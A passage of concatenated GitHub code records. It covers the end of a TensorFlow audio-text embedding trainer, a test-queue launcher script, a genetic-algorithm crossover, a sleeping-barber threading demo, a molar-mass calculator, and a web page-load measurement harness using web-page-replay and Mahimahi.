
't2a2t_loss:0')\n a2t2a_loss_tensor = self.graph.get_tensor_by_name(\n 'a2t2a_loss:0')\n all_loss = self.graph.get_tensor_by_name(\n 'all_loss:0')\n train_op = self.graph.get_operation_by_name('train_op')\n batch_iter = self.gen_batch()\n loss = 0.\n self.new_epoch = False\n for epoch_num in range(epoch):\n while not self.new_epoch:\n t2a_text, t2a_audio, a2t_audio, a2t_text = next(batch_iter)\n _, loss, t2a_loss, a2t_loss, t2a2t_loss, a2t2a_loss = self.sess.run(# noqa\n [\n train_op,\n all_loss,\n t2a_loss_tensor,\n a2t_loss_tensor,\n t2a2t_loss_tensor,\n a2t2a_loss_tensor,\n ],\n feed_dict={\n t2a_text_place: t2a_text,\n t2a_audio_place: t2a_audio,\n a2t_audio_place: a2t_audio,\n a2t_text_place: a2t_text,\n lr_place: lr,\n })\n self.new_epoch = False\n self.logger.info('Epoch {}, loss:{}'.format(\n epoch_num,\n loss,\n ))\n loss_str = 'Epoch {}, loss: {}, t2a:{}, a2t:{}, t2a2t:{}, a2t2a:{} lr:{}'\n # print(loss_str.format(epoch_num, loss, t2a_loss, a2t_loss, t2a2t_loss,\n # a2t2a_loss, lr))\n if (epoch_num+1) % 100 == 0:\n lr *= decay_factor\n if (epoch_num+1) % 1000 == 0:\n f1_score, f10_score = self.calcFscore(self.text_embeds, self.audio_embeds)\n print('F1 Score:{}, F10 Score:{}'.format(f1_score, f10_score))\n return (loss, t2a_loss, a2t_loss, t2a2t_loss, a2t2a_loss)\n def calcFscore(self, text_emb, audio_emb):\n f1_op, f10_op = self.getFscoreOps()\n t2a_text, t2a_audio, a2t_audio, a2t_text = self.getInputTensors()\n f1_score, f10_score = self.sess.run(\n [f1_op, f10_op],\n feed_dict={\n t2a_text: text_emb,\n t2a_audio: audio_emb,\n a2t_audio: audio_emb,\n a2t_text: text_emb,\n }\n )\n return f1_score, f10_score\n\n def get_matrix(self):\n a2t = self.graph.get_tensor_by_name(\n 'a2t_matrix:0')\n t2a = self.graph.get_tensor_by_name(\n 't2a_matrix:0')\n a2t_matrix = self.sess.run([a2t])\n t2a_matrix = self.sess.run([t2a])\n return a2t_matrix, t2a_matrix\n\n def save(self, path: str):\n hyper_path, var_path = self.gen_hyper_model_path(path)\n with open(hyper_path, 'wb') as hpb:\n params = {\n 'audio_dim': self.audio_dim,\n 'text_dim': self.text_dim,\n 'batch_size': self.batch_size,\n 'penalty_lambda': self.penalty_lambda,\n }\n pkl.dump(params, hpb)\n self.saver.save(self.sess, path)\n\n @classmethod\n def load(cls, path: str):\n hyper_path, var_path = cls.gen_hyper_model_path(path)\n with open(hyper_path, 'rb') as f:\n params = pkl.load(f)\n mdl = cls(**params)\n mdl.saver.restore(mdl.sess, var_path)\n return mdl\n","repo_name":"grtzsohalf/Audio-Phonetic-and-Semantic-Embedding","sub_path":"parallelizing/audio2text_ICP.py","file_name":"audio2text_ICP.py","file_ext":"py","file_size_in_byte":16038,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"22769474310","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport commands\nfrom argparse import ArgumentParser\n\ndef main():\n global eid\n eid = commands.getoutput('whoami')\n\n scope = ['all', 'py', 'ttcn']\n action = {'all' : start_all, 'py': start_py, 'ttcn': start_ttcn}\n\n parser = ArgumentParser()\n parser.add_argument('buildid', type = str, help = 'build binary')\n parser.add_argument('--testid', type = str, help = 'test binary, default = buildid', default = '', dest = 'testid')\n parser.add_argument('--scope', type = str, help = 'test scope, default = all', default = 'all', dest = 'scope', choices = scope)\n\n args = parser.parse_args()\n buildid = args.buildid\n testid = args.testid\n scope = args.scope\n\n if testid == '':\n testid = buildid\n\n 
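# --- Editorial aside (illustrative sketch, not part of either file here): the audio2text_ICP record above scores retrieval by checking, per row, whether the true match lands in the top N cosine similarities (tf.nn.in_top_k). A minimal NumPy equivalent of that recall@N metric, assuming emb1/emb2 are row-aligned so row i of each is a matching pair:\nimport numpy as np\n\ndef recall_at_n(emb1, emb2, top_n):\n    a = emb1 / np.linalg.norm(emb1, axis=1, keepdims=True)  # unit rows\n    b = emb2 / np.linalg.norm(emb2, axis=1, keepdims=True)\n    sim = a @ b.T  # (num, num) cosine-similarity matrix\n    # Rank of the true match i within row i; a hit if it is within the top N.\n    ranks = (sim >= sim.diagonal()[:, None]).sum(axis=1)\n    return float((ranks <= top_n).mean())\n\n# Sanity check: identical embeddings retrieve themselves at rank 1.\nassert recall_at_n(np.eye(4), np.eye(4), 1) == 1.0\n# --- end editorial aside ---\n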
action[scope](buildid, testid)\n\n\ndef start_all(buildid, testid):\n start_py(buildid, testid)\n start_ttcn(buildid, testid)\n\ndef start_py(buildid, testid):\n global eid\n cmds=[\n'''\nqueue_run.py --ett-specification standard --replace 1 --node-type EVRTD --suites-order LongestSuiteFirst \\\n--build-id %BUILDID% --test-type TTCN --days-to-wait 6 --label TTCN-SMF_BASIC-EVRTD_standard \\\n--priority normal+ --split-count 1 --username %EID% --test-scope SMF_BASIC --test-binary-id %TESTID% --official --max-rerun-ratio 0.1\n'''\n,\n'''\nqueue_run.py --ett-specification standard --replace 1 --node-type EVRTD --suites-order LongestSuiteFirst \\\n--build_id %BUILDID% --test-type TTCN --days-to-wait 6 --label TTCN-SMF_EXTENDED-EVRTD_standard \\\n--priority normal+ --split-count 3 --username %EID% --test-scope SMF_EXTENDED --test-binary-id %TESTID% --official --max-rerun-ratio 0.1 \n'''\n ]\n for cmd in cmds:\n cmd = cmd.replace('%BUILDID%', buildid).replace('%TESTID%', testid).replace('%EID%', eid)\n os.system(cmd)\n\ndef start_ttcn(buildid, testid):\n cmds=[\n'''\nqueue_run.py --ett-specification cups_small --replace 1 --node-type EVRTD --suites-order LongestSuiteFirst \\\n--build-id %BUILDID% --test-type TTCN --days-to-wait 6 --label TTCN-SMF_CUPS_INT-EVRTD_cups_small \\\n--priority high+ --custom-arguments '--filter-tags \\!PYTHON&&SMF_CUPS_INT' --split-count 1 --username %EID% --test-scope SMF_CUPS_INT \\\n--test-binary-id %TESTID% --official --max-rerun-ratio 0.1\n'''\n,\n'''\nqueue_run.py --ett-specification standard --node-type EVRTD --suites-order LongestSuiteFirst \\\n--build-id %BUILDID% --test-type TTCN --days-to-wait 6 --label TTCN-SMF_SA-EVRTD_standard \\\n--priority high+ --split-count 1 --username %EID% --test-scope SMF_SA --test-binary-id %TESTID% --official --max-rerun-ratio 0.1\n'''\n,\n'''\nqueue_run.py --ett-specification pccsm_ft --replace 1 --node-type CEPG --suites-order LongestSuiteFirst \\\n--build-id %BUILDID% --test-type TTCN --days-to-wait 6 --label TTCN-SMF_SA-CEPG_pccsm_ft --priority high \\\n--custom-arguments ' --filter-tags SMF_SA&&\\!NOT_READY_PCC --extra-timeout 240' --split-count 1 --username %EID% --test-scope SMF_SA \\\n--test-binary-id %TESTID% --official --max-rerun-ratio 0.1\n'''\n ]\n for cmd in cmds:\n cmd = cmd.replace('%BUILDID%', buildid).replace('%TESTID%', testid).replace('%EID%', eid)\n os.system(cmd)\n\nmain()","repo_name":"iceinveins/utilpy","sub_path":"professional.py","file_name":"professional.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73286977795","text":"import numpy as np\n\n\ndef recombinacao_ox(cromossomo_p1, cromossomo_p2):\n \"\"\"\n Realiza a recombinação OX1 sobre dois cromossomos\n :param np.ndarray cromossomo_p1: cromossomo do pai 1\n :param np.ndarray cromossomo_p2: cromossomo do pai 2\n :return: dois descendentes\n \"\"\"\n n_alelo = len(cromossomo_p1)\n pais = [cromossomo_p1, cromossomo_p2]\n descendentes = []\n for indice_pai in range(0, 2):\n cromossomo_descendente = np.full(shape=n_alelo, fill_value=-1)\n pos_corte_1 = np.random.randint(low=0, high=n_alelo-1)\n pos_corte_2 = np.random.randint(low=pos_corte_1+1, high=n_alelo)\n secao_cromossomo = pais[indice_pai][pos_corte_1:pos_corte_2]\n cromossomo_descendente[pos_corte_1:pos_corte_2] = secao_cromossomo\n locus = 0\n locus_pai = 0\n while locus < n_alelo:\n if (locus < pos_corte_1) or (locus >= pos_corte_2):\n while pais[indice_pai-1][locus_pai] in 
cromossomo_descendente:\n locus_pai += 1\n cromossomo_descendente[locus] = pais[indice_pai-1][locus_pai]\n locus += 1\n locus_pai += 1\n else:\n locus += 1\n descendentes.append([cromossomo_descendente, 0, 0])\n return descendentes\n","repo_name":"joaoppagnan/ia707-efc1","sub_path":"scripts/algoritmo_genetico/recombinacao_ox.py","file_name":"recombinacao_ox.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40482726255","text":"import random\nimport threading\nimport time\n'''\n The Sleeping-Barber Problem\n A barbershopconsists of a waiting room with n chairs and the barber room\n containing thebarber chair. If there are no customers to be served, the\n barber goes to sleep.If a customer enters the barbershop and all chairs are\n occupied, then thecustomer leaves the shop. If the barber is busy but\n chairs are available, thenthe customer sits in one of the free chairs. If\n the barber is asleep, thecustomer wakes up the barber. Write a program to\n coordinate the barber and the customers.\n 🛌代表空座\t😴代表等待\t😁代表此时此刻轮到自己\t🕺代表理发完成离开\t🏌️‍代表无空座离开\n ┐\n |代表理发师的一个工作周期\n ┘\n 本示例默认新来的顾客会在上一个等待的人的右边坐下,若上一个等待的人坐在最后一个座位,\n 则考虑第一个座位;若没有等待的人,则坐在第一个座位\n'''\n\nchairs = 5\nnext_chair = 1 # 下一个(即将到来)顾客的座位\ncustomers = threading.Semaphore(0)\nbarbers = threading.Semaphore(0)\nmutex = threading.Semaphore(1) # 锁waiting\nwaiting = 0\nscene = ['🛌' for i in range(chairs)] + ['']\n\n\ndef barber():\n global waiting, next_chair, scene\n cus = 0\n while (True):\n customers.acquire()\n mutex.acquire()\n\n # 输出\n current_customer = ((next_chair + 5) - waiting - 1) % 5\n scene[current_customer] = '😁'\n # #\n\n waiting -= 1\n\n # 输出\n if waiting == 0:\n next_chair = 1\n print(f' Barber cut customer {cus + 1:<5}\\t', *scene[:-1], ' ┐')\n scene[-1] = ' |'\n scene[current_customer] = '🛌'\n # #\n\n barbers.release()\n mutex.release()\n\n # 开始剪头发\n time.sleep(1 + random.random())\n scene[-1] = ''\n print(f' Barber end customer {cus + 1:<5}\\t', *scene[:-1], ' ┘',\n '🕺')\n cus += 1\n # #\n\n\ndef customer(cus):\n global waiting, next_chair, scene\n mutex.acquire()\n print(f'Customer {cus + 1:^3}', end=' ')\n if waiting < chairs:\n scene[next_chair - 1] = '😴'\n print(f'sits chair {next_chair}\\t', *scene)\n waiting += 1\n next_chair = next_chair % 5 + 1\n customers.release()\n mutex.release()\n barbers.acquire()\n # get_haircut\n else:\n print(f'{\"leave\":^10}\\t\\t', *scene, '🏌️‍')\n mutex.release()\n\n\nif __name__ == \"__main__\":\n cus = 0 # 顾客编号\n threading.Thread(target=barber).start()\n while True:\n threading.Thread(target=customer, args=(cus, )).start()\n time.sleep(0.5 + random.random())\n cus += 1\n","repo_name":"cnarutox/Python-Labs","sub_path":"Classical IPC Problems/sleepingBarber.py","file_name":"sleepingBarber.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33606314159","text":"from random import sample\nfrom statistics import quantiles\n\n\ndef main():\n\n answer = int(\n input(\n 'Welcome to the molar mass calculator!\\nYou give me a molecule and tell me how much of it you have, and I\\'ll tell you the molar mass of the molecule and how many moles you have. Let\\'s get started!\\nHow do you want to search for your particular molecule? \\nType \"1\" to search by chemical formula, and type \"2\" to search by molecule name. Type \"0\" to quit.\\nSo, what\\'ll it be? 
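# --- Editorial aside (illustrative sketch, not part of this file): order crossover (OX1), as in the recombinacao_ox record above, copies a slice from one parent and fills the remaining loci in the other parent's order, so the child is always a valid permutation. A deterministic mini-example with fixed cut points [2, 5) in place of the random cuts used there:\nimport numpy as np\n\np1 = np.array([1, 2, 3, 4, 5, 6, 7])\np2 = np.array([4, 3, 7, 1, 6, 5, 2])\nchild = np.full(7, -1)\nchild[2:5] = p1[2:5]  # keep slice [3, 4, 5] from p1\nfill = [g for g in p2 if g not in child]  # remaining genes, in p2's order\nchild[[0, 1, 5, 6]] = fill  # -> [7, 1, 3, 4, 5, 6, 2]\nassert sorted(child) == sorted(p1)  # still a permutation of 1..7\n# --- end editorial aside ---\n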
'\n ))\n while answer != 0:\n if answer == 1:\n formula = input(\n 'What is the chemical formula of the molecule in question? ')\n has_name, molecule_name = get_molecule_name(formula)\n if has_name:\n print(\n f'Success! Looks like I have that molecule on file. The name of your molecule is: {molecule_name}. '\n )\n else:\n print(\n f'Sorry, looks like I don\\'t know the name of \"{formula}\" yet. I can still calculate the values you need though! '\n )\n molecule_name = formula\n answer = 0\n else:\n molecule_name = input(\n 'What is the name of the molecule in question? ')\n has_formula, formula = get_molecule_formula(molecule_name)\n if has_formula:\n print(\n f'Success! Looks like I have {molecule_name} on file. The chemical formula for that one is: {formula}. '\n )\n answer = 0\n else:\n print(\n f'Sorry, looks like I don\\'t know the formula for {molecule_name} yet. Do you want to input by chemical formula? \\n'\n )\n answer = 1\n calculate(molecule_name, formula)\n\n\ndef calculate(substance, formula):\n periodic_table_dict = make_periodic_table()\n sample_mass = float(input(f'How many grams of {substance} do you have? '))\n symbol_quantity_list = parse_formula(formula, periodic_table_dict)\n molar_mass = compute_molar_mass(symbol_quantity_list, periodic_table_dict)\n moles_in_sample = sample_mass / molar_mass\n print(\n f'\\nThe molar mass of {substance} is {molar_mass:.5f}.\\nYou have {moles_in_sample:5f} moles in your sample. '\n )\n\n\ndef make_periodic_table():\n periodic_table_dict = {\n # [symbol, name, atomic_mass]\n \"Ac\": [\"Actinium\", 227],\n \"Ag\": [\"Silver\", 107.8682],\n \"Al\": [\"Aluminum\", 26.9815386],\n \"Ar\": [\"Argon\", 39.948],\n \"As\": [\"Arsenic\", 74.9216],\n \"At\": [\"Astatine\", 210],\n \"Au\": [\"Gold\", 196.966569],\n \"B\": [\"Boron\", 10.811],\n \"Ba\": [\"Barium\", 137.327],\n \"Be\": [\"Beryllium\", 9.012182],\n \"Bi\": [\"Bismuth\", 208.9804],\n \"Br\": [\"Bromine\", 79.904],\n \"C\": [\"Carbon\", 12.0107],\n \"Ca\": [\"Calcium\", 40.078],\n \"Cd\": [\"Cadmium\", 112.411],\n \"Ce\": [\"Cerium\", 140.116],\n \"Cl\": [\"Chlorine\", 35.453],\n \"Co\": [\"Cobalt\", 58.933195],\n \"Cr\": [\"Chromium\", 51.9961],\n \"Cs\": [\"Cesium\", 132.9054519],\n \"Cu\": [\"Copper\", 63.546],\n \"Dy\": [\"Dysprosium\", 162.5],\n \"Er\": [\"Erbium\", 167.259],\n \"Eu\": [\"Europium\", 151.964],\n \"F\": [\"Fluorine\", 18.9984032],\n \"Fe\": [\"Iron\", 55.845],\n \"Fr\": [\"Francium\", 223],\n \"Ga\": [\"Gallium\", 69.723],\n \"Gd\": [\"Gadolinium\", 157.25],\n \"Ge\": [\"Germanium\", 72.64],\n \"H\": [\"Hydrogen\", 1.00794],\n \"He\": [\"Helium\", 4.002602],\n \"Hf\": [\"Hafnium\", 178.49],\n \"Hg\": [\"Mercury\", 200.59],\n \"Ho\": [\"Holmium\", 164.93032],\n \"I\": [\"Iodine\", 126.90447],\n \"In\": [\"Indium\", 114.818],\n \"Ir\": [\"Iridium\", 192.217],\n \"K\": [\"Potassium\", 39.0983],\n \"Kr\": [\"Krypton\", 83.798],\n \"La\": [\"Lanthanum\", 138.90547],\n \"Li\": [\"Lithium\", 6.941],\n \"Lu\": [\"Lutetium\", 174.9668],\n \"Mg\": [\"Magnesium\", 24.305],\n \"Mn\": [\"Manganese\", 54.938045],\n \"Mo\": [\"Molybdenum\", 95.96],\n \"N\": [\"Nitrogen\", 14.0067],\n \"Na\": [\"Sodium\", 22.98976928],\n \"Nb\": [\"Niobium\", 92.90638],\n \"Nd\": [\"Neodymium\", 144.242],\n \"Ne\": [\"Neon\", 20.1797],\n \"Ni\": [\"Nickel\", 58.6934],\n \"Np\": [\"Neptunium\", 237],\n \"O\": [\"Oxygen\", 15.9994],\n \"Os\": [\"Osmium\", 190.23],\n \"P\": [\"Phosphorus\", 30.973762],\n \"Pa\": [\"Protactinium\", 231.03588],\n \"Pb\": [\"Lead\", 207.2],\n \"Pd\": [\"Palladium\", 
106.42],\n \"Pm\": [\"Promethium\", 145],\n \"Po\": [\"Polonium\", 209],\n \"Pr\": [\"Praseodymium\", 140.90765],\n \"Pt\": [\"Platinum\", 195.084],\n \"Pu\": [\"Plutonium\", 244],\n \"Ra\": [\"Radium\", 226],\n \"Rb\": [\"Rubidium\", 85.4678],\n \"Re\": [\"Rhenium\", 186.207],\n \"Rh\": [\"Rhodium\", 102.9055],\n \"Rn\": [\"Radon\", 222],\n \"Ru\": [\"Ruthenium\", 101.07],\n \"S\": [\"Sulfur\", 32.065],\n \"Sb\": [\"Antimony\", 121.76],\n \"Sc\": [\"Scandium\", 44.955912],\n \"Se\": [\"Selenium\", 78.96],\n \"Si\": [\"Silicon\", 28.0855],\n \"Sm\": [\"Samarium\", 150.36],\n \"Sn\": [\"Tin\", 118.71],\n \"Sr\": [\"Strontium\", 87.62],\n \"Ta\": [\"Tantalum\", 180.94788],\n \"Tb\": [\"Terbium\", 158.92535],\n \"Tc\": [\"Technetium\", 98],\n \"Te\": [\"Tellurium\", 127.6],\n \"Th\": [\"Thorium\", 232.03806],\n \"Ti\": [\"Titanium\", 47.867],\n \"Tl\": [\"Thallium\", 204.3833],\n \"Tm\": [\"Thulium\", 168.93421],\n \"U\": [\"Uranium\", 238.02891],\n \"V\": [\"Vanadium\", 50.9415],\n \"W\": [\"Tungsten\", 183.84],\n \"Xe\": [\"Xenon\", 131.293],\n \"Y\": [\"Yttrium\", 88.90585],\n \"Yb\": [\"Ytterbium\", 173.054],\n \"Zn\": [\"Zinc\", 65.38],\n \"Zr\": [\"Zirconium\", 91.224]\n }\n return periodic_table_dict\n\n\nclass FormulaError(ValueError):\n \"\"\"FormulaError is the type of error that\n parse_formula will raise if a formula is invalid.\n \"\"\"\n\n\ndef parse_formula(formula, periodic_table_dict):\n \"\"\"Convert a chemical formula for a molecule into a compound list\n that stores the quantity of atoms of each element in the molecule.\n For example, this function will convert \"H2O\" to [[\"H\", 2], [\"O\", 1]]\n and \"PO4H2(CH2)12CH3\" to [[\"P\", 1], [\"O\", 4], [\"H\", 29], [\"C\", 13]]\n\n Parameters\n formula: a string that contains a chemical formula\n periodic_table_dict: the compound dictionary returned\n from make_periodic_table\n Return: a compound list that contains chemical symbols and\n quantities like this [[\"Fe\", 2], [\"O\", 3]]\n \"\"\"\n assert isinstance(formula, str), \\\n \"wrong data type for parameter formula; \" \\\n f\"formula is a {type(formula)} but must be a string\"\n assert isinstance(periodic_table_dict, dict), \\\n \"wrong data type for parameter periodic_table_dict; \" \\\n f\"periodic_table_dict is a {type(periodic_table_dict)} \" \\\n \"but must be a dictionary\"\n\n def parse_quant(formula, index):\n quant = 1\n if index < len(formula) and formula[index].isdecimal():\n start = index\n index += 1\n while index < len(formula) and formula[index].isdecimal():\n index += 1\n quant = int(formula[start:index])\n return quant, index\n\n def get_quant(elems, symbol):\n return 0 if symbol not in elems else elems[symbol]\n\n def parse_r(formula, index, level):\n start_index = index\n start_level = level\n elem_dict = {}\n while index < len(formula):\n ch = formula[index]\n if ch == \"(\":\n group_dict, index = parse_r(formula, index + 1, level + 1)\n quant, index = parse_quant(formula, index)\n for symbol in group_dict:\n prev = get_quant(elem_dict, symbol)\n elem_dict[symbol] = prev + group_dict[symbol] * quant\n elif ch.isalpha():\n symbol = formula[index:index + 2]\n if symbol in periodic_table_dict:\n index += 2\n else:\n symbol = formula[index:index + 1]\n if symbol in periodic_table_dict:\n index += 1\n else:\n raise FormulaError(\n \"invalid formula, unknown element symbol:\",\n formula, index)\n quant, index = parse_quant(formula, index)\n prev = get_quant(elem_dict, symbol)\n elem_dict[symbol] = prev + quant\n elif ch == \")\":\n if level == 0:\n raise 
FormulaError(\n                        \"invalid formula, unmatched close parenthesis:\",\n                        formula, index)\n                level -= 1\n                index += 1\n                break\n            else:\n                if ch.isdecimal():\n                    # Decimal digit not preceded by an\n                    # element symbol or close parenthesis\n                    message = \"invalid formula:\"\n                else:\n                    # Illegal character: [^()0-9a-zA-Z]\n                    message = \"invalid formula, illegal character:\"\n                raise FormulaError(message, formula, index)\n        if level > 0 and level >= start_level:\n            raise FormulaError(\"invalid formula, unmatched open parenthesis:\",\n                formula, start_index - 1)\n        return elem_dict, index\n\n    # Return the compound list of element symbols and\n    # quantities. Each element in the compound list\n    # will be a list in this form: [\"symbol\", quantity]\n    elem_dict, _ = parse_r(formula, 0, 0)\n    return list(elem_dict.items())\n\n\n# Indexes for inner lists in the periodic table\nNAME_INDEX = 0\nATOMIC_MASS_INDEX = 1\n\n# Indexes for inner lists in a symbol_quantity_list\nSYMBOL_INDEX = 0\nQUANTITY_INDEX = 1\n\n\n
def compute_molar_mass(symbol_quantity_list, periodic_table_dict):\n    \"\"\"Compute and return the total molar mass of all the\n    elements listed in symbol_quantity_list.\n\n    Parameters\n        symbol_quantity_list is a compound list. Each small\n        list in symbol_quantity_list has this form:\n        [\"symbol\", quantity].\n        periodic_table_dict is the compound dictionary returned\n        from make_periodic_table.\n    Return: the total molar mass of all the elements in\n        symbol_quantity_list.\n\n    For example, if symbol_quantity_list is [[\"H\", 2], [\"O\", 1]],\n    this function will calculate and return\n    atomic_mass(\"H\") * 2 + atomic_mass(\"O\") * 1\n    1.00794 * 2 + 15.9994 * 1\n    18.01528\n    \"\"\"\n    total_mass = 0\n    # For each [symbol, quantity] pair in the compound list\n    # ('pair' rather than 'list', so the built-in list() is not shadowed):\n    for pair in symbol_quantity_list:\n        # Separate the pair into symbol and quantity.\n        symbol = pair[SYMBOL_INDEX]\n        quantity = pair[QUANTITY_INDEX]\n        # Get the atomic mass for the symbol from the dictionary.\n        atomic_mass = periodic_table_dict[symbol][ATOMIC_MASS_INDEX]\n        # Multiply the atomic mass by the quantity.\n        product = atomic_mass * quantity\n        # Add the product into the total mass.\n        total_mass = total_mass + product\n    # Return the total mass.\n    return total_mass\n\n\n
def make_molecules_dict():\n    known_molecules_dict = [{\n        'formula': \"Al2O3\",\n        'name': \"aluminum oxide\"\n    }, {\n        'formula': \"CH3OH\",\n        'name': \"methanol\"\n    }, {\n        'formula': \"C2H6O\",\n        'name': \"ethanol\"\n    }, {\n        'formula': \"C2H5OH\",\n        'name': \"ethanol\"\n    }, {\n        'formula': \"C3H8O\",\n        'name': \"isopropyl alcohol\"\n    }, {\n        'formula': \"C3H8\",\n        'name': \"propane\"\n    }, {\n        'formula': \"C4H10\",\n        'name': \"butane\"\n    }, {\n        'formula': \"C6H6\",\n        'name': \"benzene\"\n    }, {\n        'formula': \"C6H14\",\n        'name': \"hexane\"\n    }, {\n        'formula': \"C8H18\",\n        'name': \"octane\"\n    }, {\n        'formula': \"CH3(CH2)6CH3\",\n        'name': \"octane\"\n    }, {\n        'formula': \"C13H18O2\",\n        'name': \"ibuprofen\"\n    }, {\n        'formula': \"C13H16N2O2\",\n        'name': \"melatonin\"\n    }, {\n        'formula': \"Fe2O3\",\n        'name': \"iron oxide\"\n    }, {\n        'formula': \"FeS2\",\n        'name': \"iron pyrite\"\n    }, {\n        'formula': \"H2O\",\n        'name': \"water\"\n    }]\n    return known_molecules_dict\n\n\n
def get_molecule_name(formula):\n    molecules_dict = make_molecules_dict()\n    for molecule in molecules_dict:\n        if formula == molecule['formula']:\n            return True, molecule[\"name\"]\n    # Report failure only after every known molecule has been checked;\n    # returning from an else branch inside the loop would stop at the\n    # first mismatch and make every lookup after the first entry fail.\n    return False, False\n\n\ndef get_molecule_formula(molecule_name):\n    molecules_dict = make_molecules_dict()\n    for molecule in molecules_dict:\n        if molecule['name'] == molecule_name:\n            return True, molecule['formula']\n    return False, False\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"glenmeredith68/cse111","sub_path":"w08/chemistry.py","file_name":"chemistry.py","file_ext":"py","file_size_in_byte":12971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34829007998","text":"#!/usr/bin/env python3\n\nimport os\nfrom pathlib import Path\nimport pwd\nimport tempfile\nimport time\nimport shutil\nfrom signal import SIGINT\nimport subprocess\nfrom subprocess import PIPE\nimport sys\n\n\nMAHIMAHI_RECORD_DIR = \"record\"\nWPR_RECORD_FILE = \"record.wpr\"\nDELAY = 100\nTRACE = \"5Mbps_trace\"\nBW = \"5Mbit/s\"\nMEASURE_DIR = \"measurements-%d-%s\" % (DELAY, TRACE)\nRUNS = 2\nTIMEOUT = 120 # seconds\nRETRIES = 3\n\nSHELLS = [\"mm-delay\", str(DELAY), \"mm-link\", TRACE, TRACE, \"--\"]\n\n\ndef run(args, cwd=None):\n    try: # Try to clean up.\n        subprocess.run([\"killall\", \"chromedriver\"], stdout=subprocess.PIPE,\n                stderr=subprocess.PIPE, timeout=2)\n        subprocess.run([\"killall\", \"chrome\"], stdout=subprocess.PIPE,\n                stderr=subprocess.PIPE, timeout=2)\n    except Exception:\n        pass\n\n    proc = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n            preexec_fn=demote, cwd=cwd)\n    try:\n        outs, errs = proc.communicate(timeout=TIMEOUT)\n        if proc.returncode != 0:\n            raise Exception(errs)\n\n        return outs\n    except subprocess.TimeoutExpired:\n        proc.terminate()\n        raise\n\n\ndef atomic_write(content, filename):\n    # https://stackoverflow.com/questions/2333872/atomic-writing-to-file-with-python\n    tf = tempfile.NamedTemporaryFile(mode='w', delete=False)\n    tf.write(content)\n    tf.flush()\n    os.fsync(tf.fileno())\n    tf.close()\n    os.rename(tf.name, filename)\n\n\n
def record_wpr(website):\n    wpr_record_file = Path(WPR_RECORD_FILE)\n    if wpr_record_file.exists():\n        wpr_record_file.unlink()\n\n    wpr_command = [\"./replay.py\", \"-l\", \"critical\", \"--no-dns_forwarding\", \"--record\",\n                   os.path.join(os.getcwd(), WPR_RECORD_FILE)]\n    proc = subprocess.Popen(wpr_command, cwd=\"web-page-replay\")\n    try:\n        time.sleep(2)\n        run([\"./chrome-fetch-host-resolver.py\", website])\n        time.sleep(2)\n    finally:\n        proc.send_signal(SIGINT)\n        proc.wait(timeout=2)\n\n    if proc.returncode != 0:\n        # 'errs' was never defined in this function (no pipes are attached);\n        # report the exit status instead of raising a NameError here.\n        raise Exception(\"replay.py exited with status %d\" % proc.returncode)\n\n\ndef measure_wpr(website):\n    wpr_record_file = Path(WPR_RECORD_FILE)\n    if not wpr_record_file.exists():\n        raise FileNotFoundError(WPR_RECORD_FILE)\n\n    wpr_command = [\"./replay.py\", \"-l\", \"critical\", \"--up\", BW, \"--down\", BW,\n                   \"--delay_ms=%d\" % (2*DELAY), os.path.join(os.getcwd(), WPR_RECORD_FILE)]\n    proc = subprocess.Popen(wpr_command, cwd=\"web-page-replay\")\n    try:\n        time.sleep(2)\n        measure = int(run([\"./measure.py\", website]))\n        time.sleep(1)\n    finally:\n        proc.send_signal(SIGINT)\n        proc.wait(timeout=2)\n\n    if proc.returncode != 0:\n        # Same fix as in record_wpr: 'errs' does not exist in this scope.\n        raise Exception(\"replay.py exited with status %d\" % proc.returncode)\n\n    return measure\n\n\ndef dot():\n    sys.stderr.write(\".\")\n    sys.stderr.flush()\n\n\n
def measure(website, result_path):\n    print(\"Measuring %s\" % website, file=sys.stderr)\n\n    for i in range(RUNS):\n        sys.stderr.write(\"\\tRun %d \" % i)\n        sys.stderr.flush()\n        result_file = result_path / ('%s-%d' % (website, i))\n        if result_file.exists():\n            print(\"EXISTS\", file=sys.stderr)\n            continue\n\n        success = False\n        for _ in range(RETRIES):\n            try:\n                start_time = time.perf_counter()\n\n                # Raw measurement (network simulation by WPR TrafficShaper)\n                wpr_raw_measure = int(run([\"./shaped-measure.py\", website,\n                                           str(DELAY*2), BW], 
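# --- Editorial aside (worked example for the chemistry record above, not part of this file): molar mass of water from that table's atomic masses.\nh, o = 1.00794, 15.9994  # g/mol for H and O in make_periodic_table\nmolar_mass_water = 2 * h + 1 * o  # 'H2O' parses to [('H', 2), ('O', 1)]\nassert abs(molar_mass_water - 18.01528) < 1e-9\n# 9.00764 g of water is therefore 9.00764 / 18.01528 = 0.5 mol.\nassert abs(9.00764 / molar_mass_water - 0.5) < 1e-9\n# --- end editorial aside ---\n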
cwd=\"web-page-replay\"))\n dot()\n\n # Web-page-replay record\n record_wpr(website)\n dot()\n\n # Web-page-replay measure\n wpr_measure = measure_wpr(website)\n dot()\n\n # Raw measurement (network simulation by Mahimahi)\n mahimahi_raw_measure = int(run(SHELLS + [\"./measure.py\", website]))\n dot()\n\n # Mahimahi record\n if Path(MAHIMAHI_RECORD_DIR).exists():\n shutil.rmtree(MAHIMAHI_RECORD_DIR)\n run([\"mm-webrecord\", MAHIMAHI_RECORD_DIR, \"./chrome-fetch.py\",\n website])\n dot()\n\n # Mahimahi measure (multiple server)\n multi_measure = int(run([\"mm-webreplay\", MAHIMAHI_RECORD_DIR] +\n SHELLS + [\"./measure.py\", website]))\n dot()\n\n # Mahimahi measure (single server)\n single_measure = int(run([\"mm-webreplay\", \"--single-server\",\n MAHIMAHI_RECORD_DIR] + SHELLS + [\"./measure.py\", website]))\n dot()\n\n atomic_write(\"%d,%d,%d,%d,%d\\n\" % (wpr_raw_measure, wpr_measure,\n mahimahi_raw_measure, multi_measure, single_measure),\n str(result_file))\n 